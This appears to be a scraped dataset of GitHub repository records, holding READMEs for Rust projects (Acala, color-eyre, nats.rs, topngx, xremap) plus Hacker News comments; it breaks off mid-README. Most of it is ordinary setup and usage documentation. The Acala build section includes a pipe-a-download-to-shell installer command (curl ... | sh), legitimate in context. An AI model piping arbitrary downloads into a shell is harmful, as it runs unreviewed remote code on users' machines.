(IPO). ACA tokens will be offered as a reward for those who participated in the IPO, as compensation for their opportunity cost of staking the DOTs.\n\nNote: This section is still work in progress, we will update more information as we progress. Refer to the [token economy working paper](https://github.com/AcalaNetwork/Acala-white-paper) for more details.\n\n# 3. Building\n\n## NOTE\n\nTo connect on the \"Mandala TC6\" network, you will want the version `~0.7.10` code which is in this repo.\n\n- **Mandala TC6** is in [Acala repo master branch](https://github.com/AcalaNetwork/Acala/tree/master/).\n\nInstall Rust:\n\n```bash\ncurl https://sh.rustup.rs -sSf | sh\n```\n\nYou may need additional dependencies, checkout [substrate.io](https://docs.substrate.io/v3/getting-started/installation) for more info\n\n```bash\nsudo apt-get install -y git clang curl libssl-dev llvm libudev-dev protobuf-compiler\n```\n\nMake sure you have `submodule.recurse` set to true to make life with submodule easier.\n\n```bash\ngit config --global submodule.recurse true\n```\n\nInstall required tools and install git hooks:\n\n```bash\nmake init\n```\n\nBuild Mandala TC native code:\n\n```bash\nmake build-full\n```\n\n# 4. Run\n\nYou can start a development chain with:\n\n```bash\nmake run\n```\n\n# 5. Development\n\nTo type check:\n\n```bash\nmake check-all\n```\n\nTo purge old chain data:\n\n```bash\nmake purge\n```\n\nTo purge old chain data and run\n\n```bash\nmake restart\n```\n\nUpdate ORML\n\n```bash\nmake update\n```\n\n__Note:__ All build command from Makefile are designed for local development purposes and hence have `SKIP_WASM_BUILD` enabled to speed up build time and use `--execution native` to only run use native execution mode.\n\n# 6. Bug Bounty :bug:\n\nThe Bug Bounty Program includes only on-chain vulnerabilities that can lead to significant economic loss or instability of the network. You check details of the Bug Bounty or Submit a vulnerability here:\nhttps://immunefi.com/bounty/acala/\n\n# 7. Bench Bot\nBench bot can take care of syncing branch with `master` and generating WeightInfos for module or runtime.\n\n## Generate module weights\n\nComment on a PR `/bench module ` i.e.: `module_currencies`\n\nBench bot will do the benchmarking, generate `weights.rs` file and push changes into your branch.\n\n## Generate runtime weights\n\nComment on a PR `/bench runtime ` i.e.: `/bench runtime mandala module_currencies`.\n\nTo generate weights for all modules just pass `*` as `module_name` i.e: `/bench runtime mandala *`\n\nBench bot will do the benchmarking, generate weights file and push changes into your branch.\n\n## Bench Acala EVM+\n\nComment on a PR `/bench evm` to benchmark Acala EVM+ and bench bot will generate precompile weights and GasToWeight ratio.\n\n\n# 8. Migration testing runtime\nIf modify the storage, should test the data migration before upgrade the runtime.\n\n## Try testing runtime\n\ntry-runtime on karura\n\n```bash\n# Use a live chain to run the migration test.\n# Add `-p module_name` can specify the module.\nmake try-runtime-karura\n\n# Create a state snapshot to run the migration test.\n# Add `--pallet module_name` can specify the module.\ncargo run --features with-karura-runtime --features try-runtime -- try-runtime --runtime existing create-snapshot --uri wss://karura.api.onfinality.io:443/public-ws karura-latest.snap\n\n# Use a state snapshot to run the migration test.\n./target/release/acala try-runtime --runtime ./target/release/wbuild/karura-runtime/karura_runtime.compact.compressed.wasm --chain=karura-dev on-runtime-upgrade snap -s karura-latest.snap\n```\n\ntry-runtime on acala\n\n```bash\n# Use a live chain to run the migration test.\n# Add `--pallet module_name` can specify the module.\nmake try-runtime-acala\n\n# Create a state snapshot to run the migration test.\n# Add `-palet module_name` can specify the module.\ncargo run --features with-acala-runtime --features try-runtime -- try-runtime --runtime existing create-snapshot --uri wss://acala.api.onfinality.io:443/public-ws acala-latest.snap\n\n# Use a state snapshot to run the migration test.\n./target/release/acala try-runtime --runtime ./target/release/wbuild/acala-runtime/acala_runtime.compact.compressed.wasm --chain=acala-dev on-runtime-upgrade snap -s acala-latest.snap\n```\n\n# 9. Run local testnet with [parachain-launch](https://github.com/open-web3-stack/parachain-launch)\nBuild RelayChain and Parachain local testnet to develop.\n\n```bash\ncd launch\n\n# install dependencies\nyarn\n\n# generate docker-compose.yml and genesis\n# NOTE: If the docker image is not the latest, need to download it manually.\n# e.g.: docker pull acala/karura-node:latest\n# karura testnet:\nyarn start generate\n# karura-bifrost testnet:\nyarn start generate --config=karura-bifrost.yml\n\n# start relaychain and parachain\ncd output\n# NOTE: If regenerate the output directory, need to rebuild the images.\ndocker-compose up -d --build\n\n# list all of the containers.\ndocker ps -a\n\n# track container logs\ndocker logs -f [container_id/container_name]\n\n# stop all of the containers.\ndocker-compose stop\n\n# remove all of the containers.\ndocker-compose rm\n\n# NOTE: If you want to clear the data and restart, you need to clear the volumes.\n# remove volume\ndocker volume ls\ndocker volume rm [volume_name]\n# prune all volumes\ndocker volume prune\n```\n\n# 10. Build For Release\n\nFor release artifacts, a more optimized build config is used.\nThis config takes around 2x to 3x longer to build, but produces an more optimized binary to run.\n\n```bash\nmake build-release\n```\n\n# 11. Setup Local EVM+ Test Enviroment\n\nTo set up a basic local network you need two things running locally, a node and the eth-rpc-adapter. Setup each service in their respective terminals and then you are free to use your favorite EVM tools locally! (ex: hardhat)\n\n## Setting up local node\n\n#### Compile the node from source code:\n\n```bash\nmake run\n```\n\nNote: You may need normal block production for certain workflow, use command below to run node without instant-sealing flag\n\n```bash\ncargo run --features with-mandala-runtime -- --dev -lruntime=debug\n```\n\n#### Run node using docker:\n\n```bash\ndocker run -it --rm -p 9944:9944 -p 9933:9933 ghcr.io/acalanetwork/mandala-node:master --dev --ws-external --rpc-port=9933 --rpc-external --rpc-cors=all --rpc-methods=unsafe --tmp -levm=debug --instant-sealing\n```\n\n## Setting up eth-rpc-adapter\n\n```bash\nnpx @acala-network/eth-rpc-adapter -l 1\n```\n\nNote: If your usecase needs `eth_getLogs` rpc call, then you need to have a subquery instance to index the local chain. For this case, follow the tutorial found here: [Local Network Tutorial](https://evmdocs.acala.network/network/network-setup/local-development-network)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yaahc/color-eyre", "link": "https://github.com/yaahc/color-eyre", "tags": [], "stars": 684, "description": "Custom hooks for colorful human oriented error reports via panics and the eyre crate", "lang": "Rust", "repo_lang": "", "readme": "## color-eyre\n\n[![Build Status][actions-badge]][actions-url]\n[![Latest Version][version-badge]][version-url]\n[![Rust Documentation][docs-badge]][docs-url]\n\n[actions-badge]: https://github.com/yaahc/color-eyre/workflows/Continuous%20integration/badge.svg\n[actions-url]: https://github.com/yaahc/color-eyre/actions?query=workflow%3A%22Continuous+integration%22\n[version-badge]: https://img.shields.io/crates/v/color-eyre.svg\n[version-url]: https://crates.io/crates/color-eyre\n[docs-badge]: https://img.shields.io/badge/docs-latest-blue.svg\n[docs-url]: https://docs.rs/color-eyre\n\nAn error report handler for panics and the [`eyre`] crate for colorful, consistent, and well\nformatted error reports for all kinds of errors.\n\n## TLDR\n\n`color_eyre` helps you build error reports that look like this:\n\n![custom section example](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/custom_section.png)\n\n## Setup\n\nAdd the following to your toml file:\n\n```toml\n[dependencies]\ncolor-eyre = \"0.6\"\n```\n\nAnd install the panic and error report handlers:\n\n```rust\nuse color_eyre::eyre::Result;\n\nfn main() -> Result<()> {\n color_eyre::install()?;\n\n // ...\n # Ok(())\n}\n```\n\n### Disabling tracing support\n\nIf you don't plan on using `tracing_error` and `SpanTrace` you can disable the\ntracing integration to cut down on unused dependencies:\n\n```toml\n[dependencies]\ncolor-eyre = { version = \"0.6\", default-features = false }\n```\n\n### Disabling SpanTrace capture by default\n\ncolor-eyre defaults to capturing span traces. This is because `SpanTrace`\ncapture is significantly cheaper than `Backtrace` capture. However, like\nbacktraces, span traces are most useful for debugging applications, and it's\nnot uncommon to want to disable span trace capture by default to keep noise out\ndeveloper.\n\nTo disable span trace capture you must explicitly set one of the env variables\nthat regulate `SpanTrace` capture to `\"0\"`:\n\n```rust\nif std::env::var(\"RUST_SPANTRACE\").is_err() {\n std::env::set_var(\"RUST_SPANTRACE\", \"0\");\n}\n```\n\n### Improving perf on debug builds\n\nIn debug mode `color-eyre` behaves noticably worse than `eyre`. This is caused\nby the fact that `eyre` uses `std::backtrace::Backtrace` instead of\n`backtrace::Backtrace`. The std version of backtrace is precompiled with\noptimizations, this means that whether or not you're in debug mode doesn't\nmatter much for how expensive backtrace capture is, it will always be in the\n10s of milliseconds to capture. A debug version of `backtrace::Backtrace`\nhowever isn't so lucky, and can take an order of magnitude more time to capture\na backtrace compared to its std counterpart.\n\nCargo [profile\noverrides](https://doc.rust-lang.org/cargo/reference/profiles.html#overrides)\ncan be used to mitigate this problem. By configuring your project to always\nbuild `backtrace` with optimizations you should get the same performance from\n`color-eyre` that you're used to with `eyre`. To do so add the following to\nyour Cargo.toml:\n\n```toml\n[profile.dev.package.backtrace]\nopt-level = 3\n```\n\n## Features\n\n### Multiple report format verbosity levels\n\n`color-eyre` provides 3 different report formats for how it formats the captured `SpanTrace`\nand `Backtrace`, minimal, short, and full. Take the below snippets of the output produced by [`examples/usage.rs`]:\n\n---\n\nRunning `cargo run --example usage` without `RUST_LIB_BACKTRACE` set will produce a minimal\nreport like this:\n\n![minimal report format](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/minimal.png)\n\n
\n\nRunning `RUST_LIB_BACKTRACE=1 cargo run --example usage` tells `color-eyre` to use the short\nformat, which additionally capture a [`backtrace::Backtrace`]:\n\n![short report format](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/short.png)\n\n
\n\nFinally, running `RUST_LIB_BACKTRACE=full cargo run --example usage` tells `color-eyre` to use\nthe full format, which in addition to the above will attempt to include source lines where the\nerror originated from, assuming it can find them on the disk.\n\n![full report format](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/full.png)\n\n### Custom `Section`s for error reports via [`Section`] trait\n\nThe `section` module provides helpers for adding extra sections to error\nreports. Sections are disinct from error messages and are displayed\nindependently from the chain of errors. Take this example of adding sections\nto contain `stderr` and `stdout` from a failed command, taken from\n[`examples/custom_section.rs`]:\n\n```rust\nuse color_eyre::{eyre::eyre, SectionExt, Section, eyre::Report};\nuse std::process::Command;\nuse tracing::instrument;\n\ntrait Output {\n fn output2(&mut self) -> Result;\n}\n\nimpl Output for Command {\n #[instrument]\n fn output2(&mut self) -> Result {\n let output = self.output()?;\n\n let stdout = String::from_utf8_lossy(&output.stdout);\n\n if !output.status.success() {\n let stderr = String::from_utf8_lossy(&output.stderr);\n Err(eyre!(\"cmd exited with non-zero status code\"))\n .with_section(move || stdout.trim().to_string().header(\"Stdout:\"))\n .with_section(move || stderr.trim().to_string().header(\"Stderr:\"))\n } else {\n Ok(stdout.into())\n }\n }\n}\n```\n\n---\n\nHere we have an function that, if the command exits unsuccessfully, creates a\nreport indicating the failure and attaches two sections, one for `stdout` and\none for `stderr`.\n\nRunning `cargo run --example custom_section` shows us how these sections are\nincluded in the output:\n\n![custom section example](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/custom_section.png)\n\nOnly the `Stderr:` section actually gets included. The `cat` command fails,\nso stdout ends up being empty and is skipped in the final report. This gives\nus a short and concise error report indicating exactly what was attempted and\nhow it failed.\n\n### Aggregating multiple errors into one report\n\nIt's not uncommon for programs like batched task runners or parsers to want\nto return an error with multiple sources. The current version of the error\ntrait does not support this use case very well, though there is [work being\ndone](https://github.com/rust-lang/rfcs/pull/2895) to improve this.\n\nFor now however one way to work around this is to compose errors outside the\nerror trait. `color-eyre` supports such composition in its error reports via\nthe `Section` trait.\n\nFor an example of how to aggregate errors check out [`examples/multiple_errors.rs`].\n\n### Custom configuration for `color-backtrace` for setting custom filters and more\n\nThe pretty printing for backtraces and span traces isn't actually provided by\n`color-eyre`, but instead comes from its dependencies [`color-backtrace`] and\n[`color-spantrace`]. `color-backtrace` in particular has many more features\nthan are exported by `color-eyre`, such as customized color schemes, panic\nhooks, and custom frame filters. The custom frame filters are particularly\nuseful when combined with `color-eyre`, so to enable their usage we provide\nthe `install` fn for setting up a custom `BacktracePrinter` with custom\nfilters installed.\n\nFor an example of how to setup custom filters, check out [`examples/custom_filter.rs`].\n\n[`eyre`]: https://docs.rs/eyre\n[`tracing-error`]: https://docs.rs/tracing-error\n[`color-backtrace`]: https://docs.rs/color-backtrace\n[`eyre::EyreHandler`]: https://docs.rs/eyre/*/eyre/trait.EyreHandler.html\n[`backtrace::Backtrace`]: https://docs.rs/backtrace/*/backtrace/struct.Backtrace.html\n[`tracing_error::SpanTrace`]: https://docs.rs/tracing-error/*/tracing_error/struct.SpanTrace.html\n[`color-spantrace`]: https://github.com/yaahc/color-spantrace\n[`Section`]: https://docs.rs/color-eyre/*/color_eyre/section/trait.Section.html\n[`eyre::Report`]: https://docs.rs/eyre/*/eyre/struct.Report.html\n[`eyre::Result`]: https://docs.rs/eyre/*/eyre/type.Result.html\n[`Handler`]: https://docs.rs/color-eyre/*/color_eyre/struct.Handler.html\n[`examples/usage.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/usage.rs\n[`examples/custom_filter.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/custom_filter.rs\n[`examples/custom_section.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/custom_section.rs\n[`examples/multiple_errors.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/multiple_errors.rs\n\n#### License\n\n\nLicensed under either of Apache License, Version\n2.0 or MIT license at your option.\n\n\n
\n\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in this crate by you, as defined in the Apache-2.0 license, shall\nbe dual licensed as above, without any additional terms or conditions.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nats-io/nats.rs", "link": "https://github.com/nats-io/nats.rs", "tags": ["cloud-native", "messaging", "messaging-library", "microservices", "nats", "rust"], "stars": 684, "description": "Rust client for NATS, the cloud native messaging system.", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n

\n A Rust client for the NATS messaging system.\n

\n\n## Motivation\n\nRust may be one of the most interesting new languages the NATS ecosystem has seen.\nWe believe this client will have a large impact on NATS, distributed systems, and\nembedded and IoT environments. With Rust, we wanted to be as idiomatic as we\ncould be and lean into the strengths of the language. We moved many things that\nwould have been runtime checks and errors to the compiler, most notably options\non connections, and having subscriptions generate multiple styles of iterators\nsince iterators are first-class citizens in Rust. We also wanted to be aligned\nwith the NATS philosophy of simple, secure, and fast!\n\n## Clients\n\nThere are two clients available in two separate crates:\n\n### async-nats\n\n[![License Apache 2](https://img.shields.io/badge/License-Apache2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Crates.io](https://img.shields.io/crates/v/async-nats.svg)](https://crates.io/crates/async-nats)\n[![Documentation](https://docs.rs/async-nats/badge.svg)](https://docs.rs/async-nats/)\n[![Build Status](https://github.com/nats-io/nats.rs/workflows/Rust/badge.svg)](https://github.com/nats-io/nats.rs/actions)\n\nNew async Tokio-based NATS client.\n\nSupports:\n\n* Core NATS\n* JetStream API\n* JetStream Management API\n* Key Value Store\n* Object Store\n\nAny feedback related to this client is welcomed.\n\n> **Note:** async client is still <1.0.0 version and will introduce breaking changes.\n\n### nats\n\n[![License Apache 2](https://img.shields.io/badge/License-Apache2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Crates.io](https://img.shields.io/crates/v/nats.svg)](https://crates.io/crates/nats)\n[![Documentation](https://docs.rs/nats/badge.svg)](https://docs.rs/nats/)\n[![Build Status](https://github.com/nats-io/nats.rs/workflows/Rust/badge.svg)](https://github.com/nats-io/nats.rs/actions)\n\nLegacy *synchronous* client that supports:\n\n* Core NATS\n* JetStream API\n* JetStream Management API\n* Key Value Store\n* Object Store\n\nThis client will be deprecated soon, when `async-nats` reaches version 1.0, with a sync wrapper around it.\n\n### Documentation\n\nPlease refer each crate docs for API reference and examples.\n\n## Feedback\n\nWe encourage all folks in the NATS and Rust ecosystems to help us\nimprove this library. Please open issues, submit PRs, etc. We're\navailable in the `rust` channel on [the NATS slack](https://slack.nats.io)\nas well!\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gsquire/topngx", "link": "https://github.com/gsquire/topngx", "tags": ["rust", "nginx", "command-line"], "stars": 683, "description": "top for NGINX", "lang": "Rust", "repo_lang": "", "readme": "# topngx\n[![CI](https://github.com/gsquire/topngx/workflows/CI/badge.svg)](https://github.com/gsquire/topngx/actions)\n\nThis tool is a rewrite of [ngxtop](https://github.com/lebinh/ngxtop) to make it easier to install\nand hopefully run faster. For those unfamiliar with the ngxtop, it is a tool that helps you\nparse NGINX access logs and print various statistics from them regardless of format. It is\ncurrently not as feature complete as the original version but it should have enough functionality\nto be usable.\n\n![screenshot](screenshot.png)\n\n## Installation\nThere are a few ways to install it. The easiest way is to grab a release from [here](https://github.com/gsquire/topngx/releases).\nOtherwise, you can install it from [crates.io](https://crates.io/crates/topngx) with a working Rust\ninstallation:\n\n```sh\ncargo install topngx\n\n# If you do not have SQLite headers installed on your system, you can use the bundled feature.\ncargo install topngx --features bundled-sqlite\n```\n\nSQLite development headers are easy to get on Mac and Linux:\n\n```sh\n# On Mac.\nbrew install sqlite\n\n# On Debian based Linux.\nsudo apt-get update && sudo apt-get install libsqlite3-dev\n```\n\n## CHANGELOG\n[See here](CHANGELOG.md)\n\n## Usage\n```sh\ntopngx 0.3.0\nGarrett Squire \ntop for NGINX\n\nUSAGE:\n topngx [FLAGS] [OPTIONS] [SUBCOMMAND]\n\nFLAGS:\n -t, --follow Tail the specified log file. You cannot tail standard input\n -h, --help Prints help information\n -V, --version Prints version information\n\nOPTIONS:\n -a, --access-log The access log to parse\n -f, --format The specific log format with which to parse [default: combined]\n -g, --group-by Group by this variable [default: request_path]\n -w, --having Having clause [default: 1]\n -i, --interval Refresh the statistics using this interval which is given in seconds [default: 2]\n -l, --limit The number of records to limit for each query [default: 10]\n -o, --order-by Order of output for the default queries [default: count]\n\nSUBCOMMANDS:\n avg Print the average of the given fields\n help Prints this message or the help of the given subcommand(s)\n info List the available fields as well as the access log and format being used\n print Print out the supplied fields with the given limit\n query Supply a custom query\n sum Compute the sum of the given fields\n top Find the top values for the given fields\n```\n\nSome example queries are:\n\n```sh\n# Run with the default queries and format (combined).\n# Or use the --access-log and --no-follow flags if you do not want to read from standard input.\ntopngx < /path/to/access.log\n\n# Output:\ncount avg_bytes_sent 2XX 3XX 4XX 5XX\n2 346.5 2 0 0 0\nrequest_path count avg_bytes_sent 2XX 3XX 4XX 5XX\nGET / HTTP/1.1 1 612 1 0 0 0\nGET /some_file1 HTTP/1.1 1 81 1 0 0 0\n\n# See the fields that you can use for queries.\ntopngx info < access.log\n\n# Use a custom log format.\ntopngx -f '$remote_addr - $remote_user [$time_local] \"$request\" $status $bytes_sent' info\n\n# Output:\naccess log file: STDIN\naccess log format: $remote_addr - $remote_user [$time_local] \"$request\" $status $bytes_sent\navailable variables to query: remote_addr, remote_user, time_local, request_path, status_type, bytes_sent\n\n# Run a custom query.\n# The fields passed in can be viewed via the info sub command.\ntopngx query -q 'select * from log where bytes_sent > 100' -f request_path bytes_sent < access.log\n```\n\n## Limitations\nThere is no option to filter the data but this could be added in the future. The original version\nallowed for automatic detection of NGINX configuration files, log file paths, and log format styles.\ntopngx currently has command line options for these and may add this functionality in a later version.\n\nIf you find any other issues or features that may be missing, feel free to open an issue. You can\nalso utilize logging via the [env_logger](https://github.com/sebasmagri/env_logger/) crate.\n\n```sh\n# See the env_logger README for the various levels.\nRUST_LOG=debug topngx < /path/to/access.log\n```\n\n## License\nMIT\n\nThe ngxtop license can be seen [here](https://github.com/lebinh/ngxtop/blob/master/LICENSE.txt).\n", "readme_type": "markdown", "hn_comments": "Maybe not as lightweight, but GoAccess (https://github.com/allinurl/goaccess) does an awesome job at parsing the logs and displaying statistics, works for nginx and other webservers tooI wouldn't mind a screenshot before installing it.My last company had something like that and included response time percentiles (50th, 90th, 95th, 99th) and we had these values graphed and displayed on a big screen in our office. Along with a ton of other performance stats: queries per second, various measures of system load, etc.Averages can lie, especially when something like an empty query can take close to zero time compared to a non-trivial transaction. If some robot or other artifact of your site is generating a some amount of null queries that will make your average response time look better than it actually is. Percentiles, particularly on the tail of 90th or above, tell a better story of how well and consistently you're responding to traffic under load.This is the tool I've wanted (and half written 3-4 times) my whole career. From reading the github it looks lightweight, not a big infrastructure addition, and that it helps you figure out wtf is going on with the web server.Regarding the branding, for me top is a real-time tool rather than a logging tool. I was picturing something that may have been more useful for older style Apache httpd installs where you have several virtual hosts on a server and you'd want to know who is hogging the resources or causing the problems.Monitoring capabilities are missing from Nginx on purpose. They are not and will never be available for free because there is \"NGINX Plus\".This is why I recommend switching to HAProxy.How does this compare to goaccess? Similar tool that I've used briefly. One issue I had was how complicated it was, I'm assuming since this is nginx specific it's simpler.> This tool is a rewrite of ngxtop to make it more easily installed and hopefully quicker.Why make a whole new tool with limitations instead of improving the existing one?Hmmm... looks like nothing more than a weblog analyzer. Someone correct me if I'm wrong. It's not \"real time\" since it can only report on what the web-server has done not what it is doing. AFAIK, nginx has nothing like Apache httpd's mod_status... at least, nothing open source.Interesting, but I would have thought \"top\" for nginx would be a tool that shows you all the connections, paths, and resource usage live, like the \"top\" command. Is there a tool that does that?>a rewrite of ngxtop to make it more easily installed and hopefully quicker.What world does this guy live in that a program in Rust is easier to get running on any random machine than python script?I made something similar in Python [0], but for parsing the error_log directive. Just for the odd time you need to parse that.[0] https://github.com/madsmtm/nginx-error-log", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "k0kubun/xremap", "link": "https://github.com/k0kubun/xremap", "tags": ["linux", "keyboard-shortcuts", "x11", "wayland"], "stars": 683, "description": "Key remapper for X11 and Wayland", "lang": "Rust", "repo_lang": "", "readme": "# \ud835\udc4b\ud835\udc5f\ud835\udc52\ud835\udc5a\ud835\udc4e\ud835\udc5d :keyboard: [![cargo](https://github.com/k0kubun/xremap/actions/workflows/build.yml/badge.svg)](https://github.com/k0kubun/xremap/actions/workflows/build.yml)\n\n`xremap` is a key remapper for Linux. Unlike `xmodmap`, it supports app-specific remapping and Wayland.\n\n## Concept\n\n* **Fast** - Xremap is written in Rust, which is faster than JIT-less interpreters like Python.\n\n* **Cross-platform** - Xremap uses `evdev` and `uinput`, which works whether you use X11 or Wayland.\n\n* **Language-agnostic** - The config is JSON-compatible. Generate it from any language,\n e.g. [Ruby](https://github.com/xremap/xremap-ruby), [Python](https://github.com/xremap/xremap-python).\n\n## Features\n\n* Remap any keys, e.g. Ctrl or CapsLock.\n* Remap any key combination to another, even to a key sequence.\n* Remap a key sequence as well. You could do something like Emacs's `C-x C-c`.\n* Remap a key to two different keys depending on whether it's pressed alone or held.\n* Application-specific remapping. Even if it's not supported by your application, xremap can.\n* Automatically remap newly connected devices by starting xremap with `--watch`.\n* Support [Emacs-like key remapping](example/emacs.yml), including the mark mode.\n* Trigger commands on key press/release events.\n* Use a non-modifier key as a virtual modifier key.\n\n## Installation\n\nDownload a binary from [Releases](https://github.com/k0kubun/xremap/releases).\n\nIf it doesn't work, please [install Rust](https://doc.rust-lang.org/cargo/getting-started/installation.html)\nand run one of the following commands:\n\n```bash\ncargo install xremap --features x11 # X11\ncargo install xremap --features gnome # GNOME Wayland\ncargo install xremap --features sway # Sway\ncargo install xremap --features hypr # Hyprland\ncargo install xremap # Others\n```\n\nYou may also need to install `libx11-dev` to run the `xremap` binary for X11.\n\n### Arch Linux\n\nIf you are on Arch Linux and X11, you can install [xremap-x11-bin](https://aur.archlinux.org/packages/xremap-x11-bin/) from AUR.\n\n### NixOS\n\nIf you are using NixOS, xremap can be installed and configured through a [flake](https://github.com/xremap/nix-flake/).\n\n## Usage\n\nWrite [a config file](#Configuration) directly, or generate it with\n[xremap-ruby](https://github.com/xremap/xremap-ruby) or [xremap-python](https://github.com/xremap/xremap-python).\nThen run:\n\n```\nsudo xremap config.yml\n```\n\n
\nIf you want to run xremap without sudo, click here.\n\n### Running xremap without sudo\n\nTo do so, your normal user should be able to use `evdev` and `uinput` without sudo.\nIn Ubuntu, this can be configured by running the following commands and rebooting your machine.\n\n```bash\nsudo gpasswd -a YOUR_USER input\necho 'KERNEL==\"uinput\", GROUP=\"input\", TAG+=\"uaccess\"' | sudo tee /etc/udev/rules.d/input.rules\n```\n\n#### Arch Linux\n\nThe following can be used on Arch.\n\n```bash\nlsmod | grep uinput\n```\nIf this module is not loaded, add to `/etc/modules-load.d/uinput.conf`:\n```bash\nuinput\n```\nThen add udev rule.\n\n```bash\necho 'KERNEL==\"uinput\", GROUP=\"input\", MODE=\"0660\"' | sudo tee /etc/udev/rules.d/99-input.rules\n```\n\n#### Other platforms\n\nIn other platforms, you might need to create an `input` group first\nand run `echo 'KERNEL==\"event*\", NAME=\"input/%k\", MODE=\"660\", GROUP=\"input\"' | sudo tee /etc/udev/rules.d/input.rules` as well.\n\nIf you do this, in some environments, `--watch` may fail to recognize new devices due to temporary permission issues.\nUsing `sudo` might be more useful in such cases.\n\n---\n\n
\n\nSee the following instructions for your environment to make `application`-specific remapping work.\n\n### X11\n\nIf you use `sudo` to run `xremap`, you may need to run `xhost +SI:localuser:root` if you see `No protocol specified`.\n\n### GNOME Wayland\n\nInstall xremap's GNOME Shell extension from [this link](https://extensions.gnome.org/extension/5060/xremap/),\nswitching OFF to ON.\n\n
\nIf you use sudo to run xremap, also click here.\n\nUpdate `/usr/share/dbus-1/session.conf` as follows, and reboot your machine.\n\n```diff\n \n+ \n \n \n \n```\n\n
\n\n## Configuration\nYour `config.yml` should look like this:\n\n```yml\nmodmap:\n - name: Except Chrome\n application:\n not: Google-chrome\n remap:\n CapsLock: Esc\nkeymap:\n - name: Emacs binding\n application:\n only: Slack\n remap:\n C-b: left\n C-f: right\n C-p: up\n C-n: down\n```\n\nSee also: [example/config.yml](example/config.yml) and [example/emacs.yml](example/emacs.yml)\n\n### modmap\n\n`modmap` is for key-to-key remapping like xmodmap.\nNote that remapping a key to a modifier key, e.g. CapsLock to Control\\_L,\nis supported only in `modmap` since `keymap` handles modifier keys differently.\n\n```yml\nmodmap:\n - name: Name # Optional\n exact_match: false # Optional, defaults to false\n remap: # Required\n # Replace a key with another\n KEY_XXX: KEY_YYY # Required\n # Dispatch different keys depending on whether you hold it or press it alone\n KEY_XXX:\n held: KEY_YYY # Required\n alone: KEY_ZZZ # Required\n alone_timeout_millis: 1000 # Optional\n # Hook `keymap` action on key press/release events.\n KEY_XXX:\n press: { launch: [\"xdotool\", \"mousemove\", \"0\", \"7200\"] } # Required\n release: { launch: [\"xdotool\", \"mousemove\", \"0\", \"0\"] } # Required\n application: # Optional\n not: [Application, ...]\n # or\n only: [Application, ...]\n```\n\nFor `KEY_XXX` and `KEY_YYY`, use [these names](https://github.com/emberian/evdev/blob/1d020f11b283b0648427a2844b6b980f1a268221/src/scancodes.rs#L26-L572).\nYou can skip `KEY_` and the name is case-insensitive. So `KEY_CAPSLOCK`, `CAPSLOCK`, and `CapsLock` are the same thing.\nSome [custom aliases](src/config/key.rs) like `SHIFT_R`, `CONTROL_L`, etc. are provided.\n\nIf you specify a map containing `held` and `alone`, you can use the key for two purposes.\nThe key is considered `alone` if it's pressed and released within `alone_timeout_millis` (default: 1000)\nbefore any other key is pressed. Otherwise it's considered `held`.\n\n### keymap\n\n`keymap` is for remapping a sequence of key combinations to another sequence of key combinations or other actions.\n\n```yml\nkeymap:\n - name: Name # Optional\n remap: # Required\n # Key press -> Key press\n MOD1-KEY_XXX: MOD2-KEY_YYY\n # Sequence (MOD1-KEY_XXX, MOD2-KEY_YYY) -> Key press (MOD3-KEY_ZZZ)\n MOD1-KEY_XXX:\n remap:\n MOD2-KEY_YYY: MOD3-KEY_ZZZ\n timeout_millis: 200 # Optional. No timeout by default.\n # Key press (MOD1-KEY_XXX) -> Sequence (MOD2-KEY_YYY, MOD3-KEY_ZZZ)\n MOD1-KEY_XXX: [MOD2-KEY_YYY, MOD3-KEY_ZZZ]\n # Execute a command\n MOD1-KEY_XXX:\n launch: [\"bash\", \"-c\", \"echo hello > /tmp/test\"]\n # Let `with_mark` also press a Shift key (useful for Emacs emulation)\n MOD1-KEY_XXX: { set_mark: true } # use { set_mark: false } to disable it\n # Also press Shift only when { set_mark: true } is used before\n MOD1-KEY_XXX: { with_mark: MOD2-KEY_YYY }\n # The next key press will ignore keymap\n MOD1-KEY_XXX: { escape_next_key: true }\n # Set mode to configure Vim-like modal remapping\n MOD1-KEY_XXX: { set_mode: default }\n application: # Optional\n not: [Application, ...]\n # or\n only: [Application, ...]\n mode: default # Optional\ndefault_mode: default # Optional\n```\n\nFor `KEY_XXX`, use [these names](https://github.com/emberian/evdev/blob/1d020f11b283b0648427a2844b6b980f1a268221/src/scancodes.rs#L26-L572).\nYou can skip `KEY_` and the name is case-insensitive. So `KEY_CAPSLOCK`, `CAPSLOCK`, and `CapsLock` are the same thing.\n\nFor the `MOD1-` part, the following prefixes can be used (also case-insensitive):\n\n* Shift: `SHIFT-`\n* Control: `C-`, `CTRL-`, `CONTROL-`\n* Alt: `M-`, `ALT-`\n* Windows: `SUPER-`, `WIN-`, `WINDOWS-`\n\nYou can use multiple prefixes like `C-M-Shift-a`.\nYou may also suffix them with `_L` or `_R` (case-insensitive) so that\nremapping is triggered only on a left or right modifier, e.g. `Ctrl_L-a`.\n\nIf you use `virtual_modifiers` explained below, you can use it in the `MOD1-` part too.\n\n`exact_match` defines whether to use exact match when matching key presses. For\nexample, given a mapping of `C-n: down` and `exact_match: false` (default), and\nyou pressed C-Shift-n, it will automatically be remapped to\nShift-down, without you having to define a mapping for\nC-Shift-n, which you would have to do if you use `exact_match: true`.\n\n### application\n\n`application` can be used for both `modmap` and `keymap`, which allows you to specify application-specific remapping.\n\n```yml\napplication:\n not: Application\n # or\n not: [Application, ...]\n # or\n only: Application\n # or\n only: [Application, 